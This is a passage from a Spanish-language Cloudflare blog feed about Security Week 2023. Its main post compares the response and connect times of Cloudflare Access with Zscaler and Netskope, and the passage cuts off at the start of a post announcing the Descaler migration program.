    <p>.tg {border-collapse:collapse;border-spacing:0;} .tg td{border-color:black;border-style:solid;border-width:1px;font-family:Arial, sans-serif;font-size:14px; overflow:hidden;padding:10px 5px;word-break:normal;} .tg th{border-color:black;border-style:solid;border-width:1px;font-family:Arial, sans-serif;font-size:14px; font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;} .tg .tg-ycd2{background-color:#F63;color:#FFF;font-weight:bold;text-align:center;vertical-align:top} .tg .tg-zb5k{color:#15C;text-align:left;vertical-align:top} .tg .tg-0lax{text-align:left;vertical-align:top} .tg .tg-dm87{background-color:#FFF;color:#15C;text-align:left;vertical-align:top}</p><p>Blog</p><p>Resumen</p><p>   <a href="/es-es/dmarc-management-es-es/">Evita la   suplantación de marca con Cloudflare DMARC Management</a>    </p><p>   La suplantación de marca continúa siendo un   grave problema en todo el mundo. La definición de políticas SPF, DKIM y DMARC   es una buena forma de reducir el riesgo y de proteger tus dominios para   impedir su uso en correos electrónicos de suplantación. Sin embargo, el   mantenimiento de una configuración de SPF adecuada puede ser muy costoso y   requerir mucho tiempo. Por este motivo, anunciamos el lanzamiento de   Cloudflare DMARC Management.   </p><p>   <a href="/how-we-built-dmarc-management">Cómo hemos desarrollado DMARC Management con Cloudflare   Workers</a>   </p><p>   En Cloudflare, utilizamos la plataforma   Workers y nuestra pila de productos para desarrollar nuevos servicios.   Descubre cómo hemos desarrollado íntegramente nuestra nueva solución DMARC   Management sobre nuestras API.   </p><p>   <a href="/Knowbe4-emailsecurity-integration">Cloudflare   se asocia con KnowBe4 para ofrecer formación en tiempo real a las   organizaciones a fin de evitar los ataques de phishing</a>   </p><p>   La solución de seguridad del correo   electrónico en la nube de Cloudflare se integra con KnowBe4, lo que permite a   los clientes comunes ofrecer asesoramiento en tiempo real a los empleados   cuando Cloudflare detecta una campaña de suplantación de identidad.   </p><p>   <a href="/access-custom-pages">Novedad: Páginas   personalizables en Cloudflare Access</a>   </p><p>   Nos complace anunciar nuevas opciones para   personalizar la experiencia del usuario en Access, incluidas páginas personalizables   como páginas de inicio de sesión, bloqueos e iniciador de aplicaciones.      </p><p>   <a href="/network-performance-update-security-week-2023/">Cloudflare Access es el   proxy Zero Trust más rápido</a>   </p><p>   Cloudflare Access es un 75 % más rápido   que Netskope y supera en un 50 % la velocidad que ofrece Zscaler.   Además, nuestra red es más rápida que otros proveedores en el 48% de las   redes de última milla.   </p>
    <div>
      <h3>Sábado</h3>
      <a href="#sabado">
        
      </a>
    </div>
    <p>.tg {border-collapse:collapse;border-spacing:0;} .tg td{border-color:black;border-style:solid;border-width:1px;font-family:Arial, sans-serif;font-size:14px; overflow:hidden;padding:10px 5px;word-break:normal;} .tg th{border-color:black;border-style:solid;border-width:1px;font-family:Arial, sans-serif;font-size:14px; font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;} .tg .tg-ycd2{background-color:#F63;color:#FFF;font-weight:bold;text-align:center;vertical-align:top} .tg .tg-zb5k{color:#15C;text-align:left;vertical-align:top} .tg .tg-0lax{text-align:left;vertical-align:top} .tg .tg-dm87{background-color:#FFF;color:#15C;text-align:left;vertical-align:top}</p><p>Blog</p><p>Resumen</p><p>   <a href="/one-click-iso-27001-deployment">Implementación de Regional Services con certificación   ISO 27001 en la UE, con solo un clic</a>      </p><p>   Cloudflare anuncia la implementación de una   nueva región con certificación ISO en un solo clic, una forma muy fácil para   que los clientes limiten la inspección del tráfico a los centros de datos con   certificación ISO 27001 dentro de la Unión Europea.      </p><p>   <a href="/account-security-analytics-and-events">Análisis   de seguridad y eventos de seguridad a nivel de cuenta: mayor visibilidad y   control de todas las zonas de cuenta al mismo tiempo</a>   </p><p>   Todos los clientes de WAF se beneficiarán de   los análisis y eventos de seguridad a nivel de cuenta. Esta herramienta   ofrece a las organizaciones mayor visibilidad global sobre su cuenta en el   panel de control de Cloudflare. No importa cuántas zonas gestiones, ¡todas   están ahí!   </p><p>   <a href="/access-wildcard-and-multi-hostname/">Compatibilidad con comodines y nombres de host múltiple   en Cloudflare Access</a>      </p><p>   Estamos encantados de anunciar la   compatibilidad completa con definiciones de aplicaciones comodín y nombre de   host múltiple en Cloudflare Access. Hasta ahora, Access tenía limitaciones   que lo restringían a un único nombre de host o a un conjunto limitado de   comodines.   </p>
    <div>
      <h3>No te pierdas nuestras sesiones de Security Week en Cloudflare TV</h3>
      <a href="#no-te-pierdas-nuestras-sesiones-de-security-week-en-cloudflare-tv">
        
      </a>
    </div>
    <p><a href="https://cloudflare.tv/shows/security-week">Consulta toda la programación de Cloudflare TV aquí</a>.</p>
    <div>
      <h3>¿Y después?</h3>
      <a href="#y-despues">
        
      </a>
    </div>
    <p>Estas han sido las novedades de Security Week 2023, pero ya sabes que seguimos con las semanas de innovación. No te pierdas este año nuestra semana repleta de anuncios de nuevas herramientas para desarrolladores y la semana que dedicaremos a acelerar Internet.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Noticias de productos]]></category>
            <category><![CDATA[Seguridad]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[API Shield]]></category>
            <category><![CDATA[API Gateway]]></category>
            <category><![CDATA[Seguridad de la API]]></category>
            <category><![CDATA[AI]]></category>
            <guid isPermaLink="false">7e7mRjiKo0kNNOmI4oz4YH</guid>
            <dc:creator>Reid Tatoris</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare Access es el proxy Zero Trust más rápido]]></title>
            <link>https://blog.cloudflare.com/es-es/network-performance-update-security-week-2023/</link>
            <pubDate>Fri, 17 Mar 2023 15:51:36 GMT</pubDate>
            <description><![CDATA[ Cloudflare Access es un 75 % más rápido que Netskope y supera en un 50 % la velocidad que ofrece Zscaler. Además, nuestra red es más rápida que otros proveedores en el 48% de las redes de última milla ]]></description>
            <content:encoded><![CDATA[ <p>Con motivo de la semana dedicada a la innovación, Cloudflare compara el rendimiento de nuestra red frente a la competencia. En las últimas semanas, nos hemos centrado en la rapidez que ofrece nuestra red en comparación con <a href="https://www.cloudflare.com/learning/cdn/glossary/reverse-proxy/">proxies inversos</a> como Akamai, o con plataformas que venden soluciones de informática sin servidor comparables a nuestra <a href="/welcome-to-the-supercloud-and-developer-week-2022/">supernube</a>, como Fastly y AWS. Durante esta semana, nos gustaría mostrar los datos actualizados de esta comparativa con otros proxies inversos y de nuestro producto de servicios de seguridad de las aplicaciones frente a Zscaler y Netskope. Este producto forma parte de nuestra plataforma Zero Trust, que ayuda a proteger las aplicaciones y las experiencias de Internet en la red pública, a diferencia de nuestro proxy inverso, que protege tus sitios web contra los usuarios externos.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/55TdGvLzWIBgOcEtkpsMso/129826342df03d81ea5748071145665d/image6-12.png" />
            
            </figure><p>Además de nuestra <a href="/es-es/network-performance-update-cio-edition-es-es/">publicación anterior que muestra la comparativa de nuestra plataforma Zero Trust frente a Zscaler</a>, también <a href="/benchmarking-edge-network-performance/">hemos compartido anteriormente los resultados detallados de la comparativa de las redes</a> para los proxies inversos de 3000 redes de última milla de todo el mundo. Ha pasado bastante tiempo desde que te mostramos nuestros avances para ser el número uno en cada red de última milla. Queremos presentarte estos datos, así como analizar de nuevo nuestra serie de pruebas que comparan Cloudflare Access vs. Zscaler Private Access y Netskope Private Access. Para nuestras pruebas de redes globales, Cloudflare ocupa la primera posición en el 47 % de las principales 3000 redes más habituales. Para nuestras pruebas de seguridad de las aplicaciones, Cloudflare es un 50 % más rápido que Zscaler y un 75 % más rápido que Netskope.</p><p>En esta publicación, hablaremos sobre por qué el rendimiento es importante para nuestros productos, analizaremos en profundidad qué mediciones realizamos a fin de mostrar que somos más rápidos, y explicaremos cómo medimos el rendimiento de cada producto.</p>
    <div>
      <h3>¿Por qué el rendimiento es importante?</h3>
      <a href="#por-que-el-rendimiento-es-importante">
        
      </a>
    </div>
    <p>Ya hablamos sobre ello en nuestra <a href="/network-performance-update-cio-edition/">última publicación</a>, pero el rendimiento es importante porque afecta a la experiencia de tus usuarios y a su capacidad para llevar a cabo su trabajo. Ya se trate de acceder a servicios mediante productos de control de acceso, de conectarse a la red pública mediante una puerta de enlace web segura o de proteger sitios externos de riesgo mediante el aislamiento remoto del navegador, todas estas experiencias deben ser fluidas.</p><p>Un rápido resumen: supongamos que Bob, de Acme Corporation, se está conectando desde Johannesburgo a Slack o Zoom para realizar un trabajo determinado. Si la puerta de enlace web segura de Acme se encuentra lejos de Bob, en Londres, es posible que el tráfico de Bob salga de Johannesburgo a Londres y, a continuación, regrese a Johannesburgo hasta llegar a su correo electrónico. Si Bob intenta, por ejemplo, realizar una llamada de voz mediante Slack o Zoom, es posible que su rendimiento sea penosamente lento mientras espera el envío y la recepción de sus correos electrónicos. Tanto Zoom como Slack recomiendan una latencia baja para un rendimiento óptimo. Ese salto adicional que Bob debe realizar a través de su puerta de enlace podría reducir el rendimiento y aumentar su latencia. Como resultado, la experiencia de Bob sería mala.</p><p>Como ya hemos comentado antes, si estos productos o experiencias son lentos, las quejas de tus usuarios no son lo peor que podría pasar: estos pueden encontrar la manera de desactivar los productos u omitirlos. Y esto pone a tu empresa en riesgo.  Un conjunto de productos Zero Trust es completamente ineficaz si nadie lo utiliza porque es demasiado lento. Para que una solución Zero Trust sea eficaz, es fundamental garantizar su rapidez. Si los usuarios prácticamente desconocen su existencia, no querrán desactivarla ni se pondrán en riesgo.</p><p>Al igual que Zscaler, Netskope puede superar a muchas soluciones anticuadas anteriores. No obstante, su red aún no está a la altura de una red optimizada de alto rendimiento como la de Cloudflare.  Hemos probado nuestros productos Zero Trust comparándolos con sus equivalentes de Netskope, e incluso añadimos de nuevo Zscaler para mostrarte cómo Zscaler se compara también con todos ellos. Analicemos los datos. Te mostraremos cómo y por qué somos más rápidos en un escenario Zero Trust crítico, comparando Cloudflare Access con Zscaler Private Access y Netskope Private Access.</p>
    <div>
      <h3>Cloudflare Access: el proxy Zero Trust más rápido</h3>
      <a href="#cloudflare-access-el-proxy-zero-trust-mas-rapido">
        
      </a>
    </div>
    <p>El control de acceso debe ser fluido y transparente para el usuario: el mejor elogio que puede recibir una solución Zero Trust es que los usuarios apenas notan su presencia. Estos servicios permiten a los usuarios almacenar en caché la información de autenticación en la red del proveedor. Esto garantiza el acceso seguro y rápido a las aplicaciones para proporcionarles la experiencia eficaz que desean.  Por lo tanto, una red que minimiza el número de inicios de sesión necesarios y al mismo tiempo reduce la latencia de tus solicitudes de aplicaciones ayudará a que la experiencia de Internet sea ágil y reactiva.</p><p>Cloudflare Access logra todo esto un 75 % más rápido que Netskope y un 50 % más rápido que Zscaler. Esto garantiza que, dondequiera que te encuentres, obtendrás una experiencia de aplicación rápida y segura:</p><p>Cloudflare ha medido el acceso a las aplicaciones a través de nuestra red, de Zscaler y de Netskope, desde 300 ubicaciones distintas de todo el mundo que se conectan a 6 servidores de aplicaciones distintos en Hong Kong, Toronto, Johannesburgo, São Paulo, Phoenix y Suiza. En cada una de estas ubicaciones, el tiempo de respuesta del percentil 95 de Cloudflare fue más rápido que el de Zscaler y Netskope. Analicemos los datos en el caso donde la aplicación está alojada en Toronto, un área donde Zscaler y Netskope deberían obtener buenos resultados, ya que se trata de una región muy interconectada: Norteamérica.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/395y3xqEmEc1esGtwPddNw/d69cdfcfa0e12568a1bf6f2b57a7a0e7/pasted-image-0-10.png" />
            
            </figure><p>.tg {border-collapse:collapse;border-color:#ccc;border-spacing:0;} .tg td{background-color:#fff;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;overflow:hidden;padding:10px 5px;word-break:normal;} .tg th{background-color:#f0f0f0;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;} .tg .tg-0lax{text-align:left;vertical-align:top}</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1FEMU2tMrWq2Qps7mlEVTt/12311176e84fbeb5fa392503510dc6a9/pasted-image-0--1--8.png" />
            
            </figure>
<table>
<thead>
  <tr>
    <th><span>ZT Access - Response time (95th Percentile) - Toronto</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td></td>
    <td><span>95th Percentile Response (ms)</span></td>
  </tr>
  <tr>
    <td><span>Cloudflare</span></td>
    <td><span>2,182</span></td>
  </tr>
  <tr>
    <td><span>Zscaler</span></td>
    <td><span>4,071</span></td>
  </tr>
  <tr>
    <td><span>Netskope</span></td>
    <td><span>6,072</span></td>
  </tr>
</tbody>
</table><p>ZT Access - Tiempo de respuesta (percentil 95) - Toronto</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1RonjCNZLQDUTetXsKJ0q1/a07f845d76e2ab71907216a51954aeaf/pasted-image-0--2--5.png" />
            
            </figure><p>Respuesta del percentil 95 (ms)</p>
<table>
<thead>
  <tr>
    <th><span>ZT Access - Response time (95th Percentile) - South America</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td></td>
    <td><span>95th Percentile Response (ms)</span></td>
  </tr>
  <tr>
    <td><span>Cloudflare</span></td>
    <td><span>2,961</span></td>
  </tr>
  <tr>
    <td><span>Zscaler</span></td>
    <td><span>9,271</span></td>
  </tr>
  <tr>
    <td><span>Netskope</span></td>
    <td><span>8,223</span></td>
  </tr>
</tbody>
</table><p>Cloudflare</p>
<table>
<thead>
  <tr>
    <th><span>ZT Access - Connect time (95th Percentile) - South America</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td></td>
    <td><span>95th Percentile Connect (ms)</span></td>
  </tr>
  <tr>
    <td><span>Cloudflare</span></td>
    <td><span>369</span></td>
  </tr>
  <tr>
    <td><span>Zscaler</span></td>
    <td><span>1,753</span></td>
  </tr>
  <tr>
    <td><span>Netskope</span></td>
    <td><span>1,160</span></td>
  </tr>
</tbody>
</table><p>2182</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/46vdh3YktcfPIZHE7Bhgzn/6fdf8b195dfcbf8b7461484634af41d5/pasted-image-0--3--5.png" />
            
            </figure><p>Zscaler</p><p>4071</p><p>Netskope</p>
<table>
<thead>
  <tr>
    <th><span>ZT Access - Response Time (95th Percentile) - Toronto</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td></td>
    <td><span>New Sessions (ms)</span></td>
    <td><span>Existing Sessions (ms)</span></td>
  </tr>
  <tr>
    <td><span>Cloudflare</span></td>
    <td><span>1,276</span></td>
    <td><span>1,022</span></td>
  </tr>
  <tr>
    <td><span>Zscaler</span></td>
    <td><span>2,415</span></td>
    <td><span>1,797</span></td>
  </tr>
  <tr>
    <td><span>Netskope</span></td>
    <td><span>5,741</span></td>
    <td><span>1,822</span></td>
  </tr>
</tbody>
</table><p>6072</p>
<table>
<thead>
  <tr>
    <th><span>ZT Access - Response Time (95th Percentile) - Hong Kong</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td></td>
    <td><span>New Sessions (ms)</span></td>
    <td><span>Existing Sessions (ms)</span></td>
  </tr>
  <tr>
    <td><span>Cloudflare</span></td>
    <td><span>2,582</span></td>
    <td><span>2,075</span></td>
  </tr>
  <tr>
    <td><span>Zscaler</span></td>
    <td><span>4,956</span></td>
    <td><span>3,617</span></td>
  </tr>
  <tr>
    <td><span>Netskope</span></td>
    <td><span>5,139</span></td>
    <td><span>3,902</span></td>
  </tr>
</tbody>
</table><p>Cloudflare destaca realmente en las regiones con las opciones de conectividad más diversas como Sudamérica o Asia Pacífico, donde Zscaler obtiene resultados más similares a Netskope que Cloudflare:</p><p>Cuando analizamos los servidores de aplicaciones alojados localmente en Sudamérica, Cloudflare destaca:</p><p>.tg {border-collapse:collapse;border-color:#ccc;border-spacing:0;} .tg td{background-color:#fff;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;overflow:hidden;padding:10px 5px;word-break:normal;} .tg th{background-color:#f0f0f0;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;} .tg .tg-0lax{text-align:left;vertical-align:top}</p><p>ZT Access - Tiempo de respuesta (percentil 95) - Sudamérica</p><p>Respuesta del percentil 95 (ms)</p><p>Cloudflare</p><p>2961</p><p>Zscaler</p><p>9271</p><p>Netskope</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5T9VF91tGgsZqGP8e6Oak8/b2f569f2fdc3aeda8213ca9b14eedf2e/pasted-image-0--4--4.png" />
            
            </figure><p>8223</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3YiP64E2kEY9i3V7baEgTC/ed9e09ea007807b3fea8061198ef3a78/pasted-image-0--5--2.png" />
            
            </figure><p>Aquí la red de Cloudflare brilla con luz propia, ya que nos permite la entrada de conexiones cerca de los usuarios. Podemos constatar esto observando los tiempos de conexión en Sudamérica:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/pnpGlJdpxeTIoU6nc05Qy/d5e3007c4c29731b2ca60a22928c8014/pasted-image-0--6--2.png" />
            
            </figure><p>.tg {border-collapse:collapse;border-color:#ccc;border-spacing:0;} .tg td{background-color:#fff;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;overflow:hidden;padding:10px 5px;word-break:normal;} .tg th{background-color:#f0f0f0;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;} .tg .tg-0lax{text-align:left;vertical-align:top}</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3kwJ7AU0PYqaHguQDjel2L/f5fe850bbb545041ca2ce49102706908/pasted-image-0--7--4.png" />
            
            </figure><p>ZT Access - Tiempo de conexión (percentil 95) - Sudamérica</p><p>Conexión del percentil 95 (ms)</p><p>Cloudflare</p><p>369</p><p>Zscaler</p><p>1753</p><p>Netskope</p><p>1160</p><p>Aquí, la red de Cloudflare marca la diferencia porque podemos llevar más rápido a los usuarios a nuestra red y encontrar las rutas óptimas alrededor del mundo de regreso al servidor de aplicaciones. Gracias a este superpoder, somos el doble de rápidos que Zscaler y el triple de rápidos que Netskope. En las tres pruebas distintas, los tiempos de conexión de Cloudflare son sistemáticamente más rápidos en los 300 nodos de prueba.</p><p>En nuestra <a href="/network-performance-update-cio-edition/">última publicación</a>, analizamos dos escenarios distintos que era necesario medir individualmente para la comparación de Cloudflare y Zscaler. El primero de ellos es cuando un usuario inicia sesión en su aplicación y debe autenticarse. En este caso, el servicio Zero Trust Access dirigirá al usuario a una página de inicio de sesión, el usuario se autenticará y, a continuación, se redirigirá a su aplicación.</p><p>Nombramos a este escenario "nueva sesión", porque no hay ninguna información de autenticación almacenada en caché ni existe esta información en la red de Access. Denominamos al segundo escenario "sesión existente", cuando un usuario ya se ha autenticado y esa información de autenticación se puede almacenar en la caché. Este escenario suele ser mucho más rápido, porque no requiere una llamada adicional a un proveedor de identidad para completarse.</p><p>Queremos medir estos escenarios por separado, puesto que al analizar los valores del percentil 95, si combináramos sesiones nuevas y existentes, casi siempre estaríamos mirando a sesiones nuevas. Sin embargo, en ambos escenarios, Cloudflare es sistemáticamente más rápido en cada región. Volvamos al caso de una aplicación alojada en Toronto, donde los usuarios que se conectan a nosotros lo hacen más rápido que a Zscaler y Netskope tanto para sesiones nuevas como existentes.</p><p>.tg {border-collapse:collapse;border-color:#ccc;border-spacing:0;} .tg td{background-color:#fff;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;overflow:hidden;padding:10px 5px;word-break:normal;} .tg th{background-color:#f0f0f0;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;} .tg .tg-0lax{text-align:left;vertical-align:top}</p><p>ZT Access - Tiempo de respuesta (percentil 95) - Toronto</p><p>Sesiones nuevas (ms)</p><p>Sesiones existentes (ms)</p><p>Cloudflare</p><p>1276</p><p>1022</p><p>Zscaler</p><p>2415</p><p>1797</p><p>Netskope</p><p>5741</p><p>1822</p><p>Puedes observar que las sesiones nuevas suelen ser más lentas de lo esperado. Sin embargo, la red y la pila de software optimizado de Cloudflare proporcionan una experiencia de usuario sistemáticamente rápida. En escenarios donde la conectividad de un extremo a otro puede resultar más compleja, Cloudflare destaca aún más. Analicemos los usuarios de Asia que se conectan mediante una aplicación en Hong Kong.</p><p>.tg {border-collapse:collapse;border-color:#ccc;border-spacing:0;} .tg td{background-color:#fff;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;overflow:hidden;padding:10px 5px;word-break:normal;} .tg th{background-color:#f0f0f0;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;} .tg .tg-0lax{text-align:left;vertical-align:top}</p><p>ZT Access - Tiempo de respuesta (percentil 95) - Hong Kong</p><p>Sesiones nuevas (ms)</p><p>Sesiones existentes (ms)</p><p>Cloudflare</p><p>2582</p><p>2075</p><p>Zscaler</p><p>4956</p><p>3617</p><p>Netskope</p><p>5139</p><p>3902</p><p>Un aspecto interesante que destaca aquí es que mientras que la red de Cloudflare está hiperoptimizada para el rendimiento, los resultados de rendimiento de Zscaler son más similares a Netskope que a los de Cloudflare. Netskope tampoco obtiene buenos resultados de rendimiento en las sesiones nuevas, lo que indica que su servicio no reacciona adecuadamente cuando los usuarios establecen sesiones nuevas.</p><p>Queremos separar las sesiones nuevas y las sesiones existentes porque es importante analizar rutas de solicitud similares para realizar la comparación correctamente. Por ejemplo, si comparáramos una solicitud mediante Zscaler en una sesión existente y una sesión mediante Cloudflare en una sesión nueva, podríamos observar que Cloudflare es mucho más lento que Zscaler debido a la necesidad de autenticación. Por lo tanto, cuando hemos contratado a un tercero para diseñar estas pruebas, nos hemos asegurado de que tenían esto en cuenta.</p><p>Para estas pruebas, Cloudflare configuró cinco instancias de aplicación alojadas en Toronto, Los Angeles, Sao Paulo, Johannesburg y Hong Kong. A continuación, Cloudflare utilizó 300 nodos de Catchpoint distintos de todo el mundo para simular un inicio de sesión en el navegador, de la forma siguiente:</p><ul><li><p>El usuario se conecta a la aplicación desde un navegador que imita una instancia de Catchpoint - sesión nueva.</p></li><li><p>El usuario se autentica en el proveedor de identidad.</p></li><li><p>El usuario accede al recurso.</p></li><li><p>El usuario renueva la página del navegador e intenta acceder al mismo recurso pero con credenciales ya existentes - sesión existente.</p></li></ul><p>Esto nos permite comparar Cloudflare vs. todos los otros productos en cuanto al rendimiento de la aplicación, tanto para sesiones nuevas como para sesiones existentes, y hemos mostrado que somos más rápidos. Como hemos mencionado, eso se debe en gran medida a nuestra red y a que estamos cerca de nuestros usuarios. Por lo tanto, ahora hablaremos acerca de cómo nos comparamos con otras redes importantes y de lo cerca que estamos de tu ubicación.</p>
    <div>
      <h3>Los efectos de la red mejoran la experiencia del usuario</h3>
      <a href="#los-efectos-de-la-red-mejoran-la-experiencia-del-usuario">
        
      </a>
    </div>
    <p>Acercarse a los usuarios mejora el tiempo de viaje de ida y vuelta (RTT) de última milla. Como comentamos en la comparación de Access, un RTT bajo mejora la experiencia del cliente porque las sesiones nuevas y existentes no necesitan viajar muy lejos para acceder a la red Zero Trust de Cloudflare. Nuestra integración en estas redes de última milla nos ayuda a acercarnos a nuestros usuarios, lo que no solo ayuda al rendimiento de Zero Trust, sino también al <a href="/network-performance-update-security-week/">rendimiento de la web</a> y al <a href="/network-performance-update-developer-week/">rendimiento de los desarrolladores</a>, como hemos comentado en publicaciones anteriores.</p><p>Para cuantificar el rendimiento de la red, debemos obtener datos suficientes de todo el mundo, en todo tipo de redes, comparándonos con otros proveedores. Hemos utilizado mediciones de usuarios reales (RUM) para obtener un archivo de 100 kB de distintos proveedores. Usuarios de todo el mundo nos comunican el rendimiento de los distintos proveedores. Cuanto mayor es el número de usuarios que nos facilitan los datos, mayor es la fidelidad de la señal. El objetivo es proporcionar una imagen precisa de dónde los distintos proveedores son más rápidos y, lo que es más importante, dónde Cloudflare puede mejorar. Puedes obtener más información sobre la metodología en la publicación original del blog de Speed Week 2021 <a href="/benchmarking-edge-network-performance/">aquí</a>.</p><p>Continuamente intentamos descubrir por qué no hemos sido todo lo rápidos que hubiéramos querido, e intentamos mejorar. Los desafíos que hemos afrontado eran específicos de cada red y han puesto de manifiesto una serie de problemas comunes de Internet. Proporcionaremos una descripción general de algunos de los esfuerzos que realizamos para mejorar nuestro rendimiento para nuestros usuarios.</p><p>Sin embargo, antes queremos mostrar los resultados de nuestros esfuerzos desde Developer Week 2022, la última vez que presentamos estas cifras. De las principales 3000 redes del mundo (por número de direcciones IPv4 anunciadas), aquí mostramos un desglose del número de redes donde cada proveedor es el número uno en tiempo de conexión TCP p95, que representa el tiempo que requiere un usuario de una red determinada para conectarse al proveedor:</p><p>A continuación mostramos cuáles son esas cifras con fecha de esta semana, Security Week 2023:</p><p>Como puedes observar, Cloudflare ha ampliado su liderazgo como la más rápida en más redes, mientras que otras redes que anteriormente eran más rápidas, como Akamai y Fastly, han perdido su liderazgo. Esto se traduce en los efectos que observamos en el mapa mundial. Este era el aspecto que tenía el mapa mundial con fecha de la Semana del Desarrollador 2022:</p><p>Este es el aspecto del mapa mundial a fecha de hoy durante Security Week 2023:</p><p>Como puedes ver, Cloudflare ahora es más rápido en Brasil, en muchos países de África, incluidos Sudáfrica, Etiopía y Nigeria, así como en Indonesia en Asia, y en Noruega, Suecia y el Reino Unido en Europa.</p><p>Muchos de estos países se han beneficiado del programa de socios perimetrales que comentamos en la <a href="/how-cloudflare-helps-next-generation-markets/">publicación de Impact Week</a>. A modo de breve recordatorio, el programa de socios perimetrales anima a los proveedores de servicios de Internet de última milla a asociarse con Cloudflare para la implementación de ubicaciones de Cloudflare integradas en los proveedores de servicios de Internet de última milla. Esto mejora el RTT de última milla y el rendimiento, por ejemplo, de Access. Desde que te mostramos por última vez este mapa, Cloudflare ha implementado más ubicaciones de socios en lugares como Nigeria y Arabia Saudí, que han mejorado el rendimiento para los usuarios en todos los escenarios. Esfuerzos como el programa de socios perimetrales ayudan a mejorar no solo los escenarios Zero Trust como hemos descrito más arriba, sino también la experiencia de navegación web general para los usuarios finales que utilizan sitios web protegidos por Cloudflare.</p>
    <div>
      <h3>Rendimiento de nueva generación en un entorno Zero Trust</h3>
      <a href="#rendimiento-de-nueva-generacion-en-un-entorno-zero-trust">
        
      </a>
    </div>
    <p>En un entorno que no era Zero Trust, tú y tus equipos informáticos erais los operadores de la red, lo que os proporcionaba la capacidad de controlar el rendimiento. Aunque este control era tranquilizador, también era una carga enorme para tus equipos informáticos, que tenían que administrar las conexiones de milla intermedia entre las oficinas y los recursos. Por el contrario, en un entorno Zero Trust, tu red es ahora… la red pública. Esto implica menos trabajo para tus equipos, pero mucha más responsabilidad para tu proveedor Zero Trust, que debe gestionar el rendimiento para cada uno de tus usuarios.  Cuanto más mejore tu proveedor Zero Trust el rendimiento de un extremo a otro, mejor será la experiencia de tus usuarios y menor el riesgo al que estarás expuesto.  En el caso de aplicaciones en tiempo real como las de autenticación y las puertas de enlace web seguras, una experiencia de usuario ágil es fundamental.</p><p>Un proveedor Zero Trust no solo debe proteger a tus usuarios en la red pública. También debe optimizar la red pública para garantizar que tus usuarios están continuamente protegidos. La adopción de Zero Trust no solo reduce la necesidad de redes corporativas. También permite un tránsito más natural del tráfico de los usuarios a los recursos. Sin embargo, puesto que tu proveedor Zero Trust será quien proteja a todos tus usuarios y todas tus aplicaciones, el rendimiento es un aspecto fundamental a evaluar para reducir las dificultades de tus usuarios así como la probabilidad de que estos se quejen, de que sean menos productivos o de que desactiven las soluciones. En Cloudflare mejoramos constantemente nuestra red para garantizar siempre a los usuarios la mejor experiencia, mediante programas como el <a href="https://www.cloudflare.com/partners/peering-portal/">programa de socios perimetrales</a> y mejorando continuamente nuestro emparejamiento y nuestras interconexiones. Gracias a estos esfuerzos constantes somos el proveedor Zero Trust más rápido.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Network Performance Update]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[Velocidad]]></category>
            <guid isPermaLink="false">2NLiXQiyusslT7k8fg7G97</guid>
            <dc:creator>David Tuber</dc:creator>
        </item>
        <item>
            <title><![CDATA[Migración sencilla de Zscaler a Cloudflare One con el programa Descaler]]></title>
            <link>https://blog.cloudflare.com/es-es/descaler-program/</link>
            <pubDate>Tue, 14 Mar 2023 13:00:00 GMT</pubDate>
            <description><![CDATA[ Nos complace presentar el lanzamiento del programa Descaler, una ruta para migrar sin dificultades los clientes de Zscaler existentes a Cloudflare One. Cloudflare facilita aún más que los clientes empresariales puedan realizar el cambio a una base más rápida, sencilla y ágil para la transformación ]]></description>
            <content:encoded><![CDATA[ <p>Hoy, Cloudflare se complace en presentar el lanzamiento del programa Descaler, una ruta para migrar sin dificultades los clientes de Zscaler existentes a Cloudflare One. Con este anuncio, Cloudflare facilita aún más que los clientes empresariales puedan realizar el cambio a una base más <a href="/es-es/network-performance-update-cio-edition-es-es/">rápida</a>, sencilla y ágil para la transformación de la seguridad y de la red.</p>
            <figure>
            
